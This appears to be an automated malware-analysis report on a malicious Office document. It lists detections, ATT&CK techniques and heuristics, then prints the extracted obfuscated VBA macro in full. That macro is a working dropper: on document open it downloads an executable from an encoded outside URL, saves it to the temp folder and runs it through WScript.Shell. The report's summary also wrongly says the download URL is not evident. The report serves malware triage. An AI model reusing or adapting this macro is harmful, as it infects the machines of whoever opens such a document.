MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. The macros utilize `Shell()` and `WScript.Shell` to execute arbitrary code, indicating it functions as a dropper. The ClamAV detection name 'Doc.Dropper.Donoff-5743530-0' further supports this assessment. The specific payload or download URL is not directly evident in the provided script, but the intent is clearly to download and execute a second-stage payload.
Heuristics 10
-
ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Dim EodzZDPL As Boolean, FxaIym As String Set nMfUcbkG = CreateObject("WScript.Shell") End Function -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim EodzZDPL As Boolean, FxaIym As String Set nMfUcbkG = CreateObject("WScript.Shell") End Function -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
Public Sub bgDKJRS(ByVal VyRpvV As Integer, ByVal xoqaDLo As Object, ByVal qwJny As String) CallByName xoqaDLo, qwJny, 1 End Sub -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Sub Private Sub Document_Open() Dim dWpVrc As Boolean -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9059 bytes |
SHA-256: b22d299542f9dbed8fa502a715d024beebf3e6f6986ccbc4d66caeb5f869a881 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
160 of 255 identifiers look randomly generated (e.g. 'ReXsGOpoqnOsOeqBGOoqdyG') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub fDZFHim(ByVal KXhrdA As String, ByVal zHbISYR As String)
wHTiRT
If mjspzU(9002, 675, "pHSUfIWtMS1") Then
jGxNa True, "Xm8sNzgkJFS", "7cctFI0k3FgWx2d"
QwNZHX
tmRfIVJh 807
End If
End Sub
Private Sub AieuB(ByVal CcjoWhBh As Integer)
YoQROe 280, "luy5QYdPCP", 3880
nSBNYIEqi
szgGkotf 3197, "VEY3QBHYW", True
End Sub
Private Sub Document_Open()
Dim dWpVrc As Boolean
YEVWrnxjZw.IdmgRsM
End Sub
Private Sub FDRSuguNZf()
mqxGfUKgzi 6499, "qUBEQcUuFXEWj", "k0YqWvHPfgo"
MmaltzrlX 1715
If hBTkqIt("PjLaitTZmv") Then
rRoMb
Else
yqyGeqxn
End If
End Sub
Private Function sRDnUwJHSD() As String
yhlAeROGu
sRDnUwJHSD = "VFaG1negNe6bV"
End Function
Attribute VB_Name = "AlJtwNCb"
Private Function AEkJuoQXn(ByVal SjFGXBSIZo As Boolean, ByVal QywIAsVIlU As String) As Boolean
aAnoEkmH
TYWXT
SIYNpFH
If bIFLsWSDYA Then
sjrIRNel
pIxxnGPm True, 5648
Else
oRDnv
GIOdryBDU
End If
AEkJuoQXn = False
End Function
Public Function NzbElOh(ByVal OcSPG As String, ByVal BLrczxe As String) As String
Dim lZvgod As Boolean
Dim AXqlhEwBJM As String
crcNfikH = "yNlcbVjCGY"
For lZMFrSpy = 1 To Len(OcSPG)
lZvgod = jNiMX.mvDohfyl(jNiMX.ViNpHGUzC(lZMFrSpy, 5243, AjJJop, OcSPG), BLrczxe)
If Not lZvgod Then
NzbElOh = jNiMX.TpFOIGlDV(2102, True, jNiMX.ViNpHGUzC(lZMFrSpy, 5243, AjJJop, OcSPG), NzbElOh)
fitPL = "VkxeMRma7"
End If
Next
End Function
Private Function qgxwLgW() As Integer
ngHBnhTd 5855, 1524
UimfM
kCujVAMx
If zXmQhJr Then
vMylTY
ROzIu
End If
qgxwLgW = 5758
End Function
Private Function AjJJop() As String
AjJJop = "kgTosaNcQtJKyZ"
End Function
Attribute VB_Name = "CdauetYt"
Private Sub FVuRKIl(ByVal pmWuLilpm As Boolean, ByVal aIqbK As Integer)
JdrgwQ
End Sub
Public Function nMfUcbkG() As Object
Dim EodzZDPL As Boolean, FxaIym As String
Set nMfUcbkG = CreateObject("WScript.Shell")
End Function
Public Function yFOARrxkL() As Object
Set yFOARrxkL = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Sub moqIyd()
If euVWF Then
EqgCajclK 1379, False, "kEZ7ikRgqZjN"
End If
End Sub
Private Sub Ixnbt(ByVal qhzmzrgK As String)
rwKYqDFg True, 2503
End Sub
Public Function QLILYAMDT() As Object
Dim joIhfWf As Boolean
Set QLILYAMDT = CreateObject("ADODB.Stream")
End Function
Private Function ttnweZ() As Integer
scmBSvpTk 2792
lJSsRbNCDs
jTPYG 698, True
upFcL "131Q7ACPrtPZO", "SD4TCKeu3IHqlc2", 3231
ttnweZ = 5750
End Function
Attribute VB_Name = "jNiMX"
Public Function ViNpHGUzC(ByVal iypWTXolxU As Integer, ByVal jczgA As Integer, ByVal oCpmeit As String, ByVal FEJfWi As String) As String
Dim HNuKWgufOM As Integer, PsDspeSF As Integer
ViNpHGUzC = Mid(FEJfWi, iypWTXolxU, 1)
End Function
Private Sub eXjGJd(ByVal zCMPR As Integer, ByVal dPzEeruZQc As String)
BkMTwPAnUV "DkDIO3d6F3v8Mi", 5936
vVjYXg 5637
If LYvcZvEUHc Then
ZkAFSHcy
RYUrsdm True
aVgAUZYDE 8658, "P6L2iKiDrLlkp", "PDySOMDaa"
End If
nnWkkdeYWI "91T1EaHzvPf58N", "UWH71R60USte", False
tvremm "rlrJFAUEIT", "HKcOUGSxKiDVYL", True
End Sub
Public Function TpFOIGlDV(ByVal YHmyK As Integer, ByVal siwdxix As Boolean, ByVal WrNacB As String, ByVal tCmhcnjaw As String) As String
TpFOIGlDV = tCmhcnjaw & WrNacB
End Function
Public Function mvDohfyl(ByVal QwewSsD As String, ByVal nlWobCMCMV As String) As Boolean
Dim nemKWAiIl As Integer
mvDohfyl = InStr(1, nlWobCMCMV, QwewSsD)
End Function
Attribute VB_Name = "SiovGt"
Private Sub ClDEAxxw(ByVal IMxuPR As Boolean, ByVal UBQIToI As Integer)
QzYClH "FnNC3zJ5JxoN2U", 8941, "rCG482M5g"
End Sub
Public Sub bgDKJRS(ByVal VyRpvV As Integer, ByVal xoqaDLo As Object, ByVal qwJny As String)
CallByName xoqaDLo, qwJny, 1
End Sub
Public Sub uLMdQEzSM(ByVal EHhZvkvY As Variant, ByVal sZbhA As String, ByVal nQJGcyJuxH As Variant, ByVal loEiPnFEA As Object, ByVal quuPFeRPwX As Variant)
IXNhTW = "l2VZR9nD2"
CallByName loEiPnFEA, sZbhA, 1, EHhZvkvY, nQJGcyJuxH, quuPFeRPwX
End Sub
Public Function kHJDvJ(ByVal nYiINdSYPo As String, ByVal QimeyGm As Object, ByVal kKdMPKx As String) As Variant
Dim VmKBS As Integer, bAmMXC As Integer
Set kHJDvJ = CallByName(QimeyGm, nYiINdSYPo, 2, kKdMPKx)
End Function
Public Sub QavSmHwAdE(ByVal kXMXvgXM As Variant, ByVal UihLPcbp As String, ByVal LbRDnPIz As Integer, ByVal zwuHQkbdv As Variant, ByVal AvKZEdLCKg As String, ByVal ZdFxP As Object)
CallByName ZdFxP, UihLPcbp, 1, kXMXvgXM, zwuHQkbdv
End Sub
Public Sub HQvScqTefi(ByVal OnIWlzab As Boolean, ByVal Jmipofj As Variant, ByVal bNiRsuvF As Object, ByVal jXGWtA As String)
CallByName bNiRsuvF, jXGWtA, 4, Jmipofj
End Sub
Private Sub jIAMbLT(ByVal AEwBfCTeA As Integer, ByVal vOPGfq As Integer)
VYZRTX "PMlVAnnZYb"
FaPULoVT 5592, "iL2G7ATQq9s", "6nCQR9WtSsb"
End Sub
Public Sub lITquzHn(ByVal NIuVH As String, ByVal DGnrbz As Object, ByVal ltxCfvQYK As Integer, ByVal MWKWM As Variant, ByVal vvSEm As String)
CallByName DGnrbz, vvSEm, 1, MWKWM
End Sub
Public Function JvWgrglen(ByVal xfQxkqo As String, ByVal afGcAxt As String, ByVal dJYFud As Object) As Variant
Dim FzqRXM As Integer, UNYDxtaaT As Boolean
JvWgrglen = CallByName(dJYFud, afGcAxt, 2)
End Function
Attribute VB_Name = "YEVWrnxjZw"
Private Function rvYdOAwcuH(ByVal aYERV As String, ByVal tqCeR As String) As String
Dim CylOKlM As Integer
Set HWNSf = SiovGt.kHJDvJ(YRFtRyuOMI, CdauetYt.nMfUcbkG, AlJtwNCb.NzbElOh("P3RAWOVCVES3VS", ".A3VW"))
rvYdOAwcuH = HWNSf(aYERV)
End Function
Private Function XQQHRivB() As String
XQQHRivB = AlJtwNCb.NzbElOh("OYp4eCnC", "CY4 ")
End Function
Private Function YRFtRyuOMI() As String
YRFtRyuOMI = AlJtwNCb.NzbElOh("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX")
End Function
Private Function noPgfimLQl() As String
noPgfimLQl = "eJdybT86JRL"
End Function
Private Sub utuhmS(ByVal uKjCSio As String, ByVal qoqVV As String)
Set ttAvUNZbD = CdauetYt.yFOARrxkL
SiovGt.uLMdQEzSM OzsMX, AlJtwNCb.NzbElOh("OYp4eCnC", "CY4 "), uKjCSio, ttAvUNZbD, False
SiovGt.QavSmHwAdE AlJtwNCb.NzbElOh("UJsJJerj-JJAjgJeJnGt", "GJj"), YBKUEtVd, 2963, AlJtwNCb.NzbElOh("Mv5ovzviluvl5av/45v.0uv 5(cvvomv5pautuiuvbvle5;5u)", "5uv"), NbJTHGCP, ttAvUNZbD
SiovGt.bgDKJRS 1177, ttAvUNZbD, bcUkOw
WKCFjIMPBW True, 6317, qoqVV, SiovGt.JvWgrglen(NbJTHGCP, tEVIdsD, ttAvUNZbD)
End Sub
Private Function tEVIdsD() As String
tEVIdsD = AlJtwNCb.NzbElOh(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO")
End Function
Private Sub gbNWoi()
Dim HttjRmGJ As Integer
OIRUtHf = True
On Error GoTo ikwBA
zIxdob = False
utuhmS XbpIXBreKI, qpfZb
KpfAeitTid qpfZb
Exit Sub
ikwBA:
End Sub
Private Function qpfZb() As String
Dim TQUHiRmd As Integer, hIKrUpMu As Integer
qpfZb = rvYdOAwcuH(AlJtwNCb.NzbElOh("ZTEUMZsP", "9cZUsX"), "rlpEKNMdbrH3gcN") & ureCwD
End Function
Private Function HgLZFJd() As String
HgLZFJd = AlJtwNCb.NzbElOh("nTyHpaeB", "HBaqXn")
End Function
Private Function ureCwD() As String
Dim duAGGyqSxo As Integer
Dim AhCLLHJB As Integer
JJNlxuFaS = True
ureCwD = yUuhMmQyGP
End Function
Private Sub KpfAeitTid(ByVal OGiVlfDvNr As String)
SiovGt.lITquzHn "G29r6KbTng", CdauetYt.nMfUcbkG, 7188, OGiVlfDvNr, AlJtwNCb.NzbElOh("kEx2eI1c", "k31IG2")
End Sub
Private Function NbJTHGCP() As String
NbJTHGCP = "g81SabjfIw6"
End Function
Public Sub IdmgRsM()
Dim ZcKzmV As Integer
Dim ZJXOxiAU As Boolean
kZsag = 4121
gbNWoi
End Sub
Private Function NPLIiMfm() As String
NPLIiMfm = AlJtwNCb.NzbElOh("YClm/o/s0e", "0dY/m")
End Function
Private Function XbpIXBreKI() As String
Dim nTCnT As Integer
XbpIXBreKI = AlJtwNCb.NzbElOh("hBtYUtpYU:Y//YmYaYBgUaBzYinUBesYeUYmUprUeYbBeYlUlBUaU.cYoBYmB/UsBysUtYeUmUY/BcUacBhBeUY/UwoBrUUdY.eYYxUe", "YUB")
End Function
Private Sub WKCFjIMPBW(ByVal nYjlPOglL As Boolean, ByVal Qhqsj As Integer, ByVal mFQrVpW As String, ByVal InZuOq As Variant)
Dim nIDzD As Boolean
Dim OGwEZVg As Integer
Set iIHcTWxaSP = CdauetYt.QLILYAMDT
SiovGt.HQvScqTefi True, 1, iIHcTWxaSP, HgLZFJd
SiovGt.bgDKJRS 1177, iIHcTWxaSP, XQQHRivB
uRUxACPwrk = 5904
SiovGt.lITquzHn noPgfimLQl, iIHcTWxaSP, 7188, InZuOq, AlJtwNCb.NzbElOh("Wbbribtzek", "Zzlmkb")
sIbLjqP = "zGfxeChfYk2NCyH"
SiovGt.QavSmHwAdE mFQrVpW, nAsYQtvB, 2963, 2, noPgfimLQl, iIHcTWxaSP
SiovGt.bgDKJRS 1177, iIHcTWxaSP, NPLIiMfm
End Sub
Private Function OzsMX() As String
XBoKEL = False
OzsMX = AlJtwNCb.NzbElOh("G.E TB", ".BA ")
End Function
Private Function nAsYQtvB() As String
nAsYQtvB = AlJtwNCb.NzbElOh("pSraUvremToVUFimlVed", "mprdUV")
End Function
Private Function yUuhMmQyGP() As String
yUuhMmQyGP = AlJtwNCb.NzbElOh("/76owfbV879w4eo1o8w027fw14Vb5V7a41o.VeoxeV", "V7wo4")
End Function
Private Function YBKUEtVd() As String
YBKUEtVd = AlJtwNCb.NzbElOh("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp")
End Function
Private Function bcUkOw() As String
bcUkOw = AlJtwNCb.NzbElOh("SIerIndr", "MIrG")
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.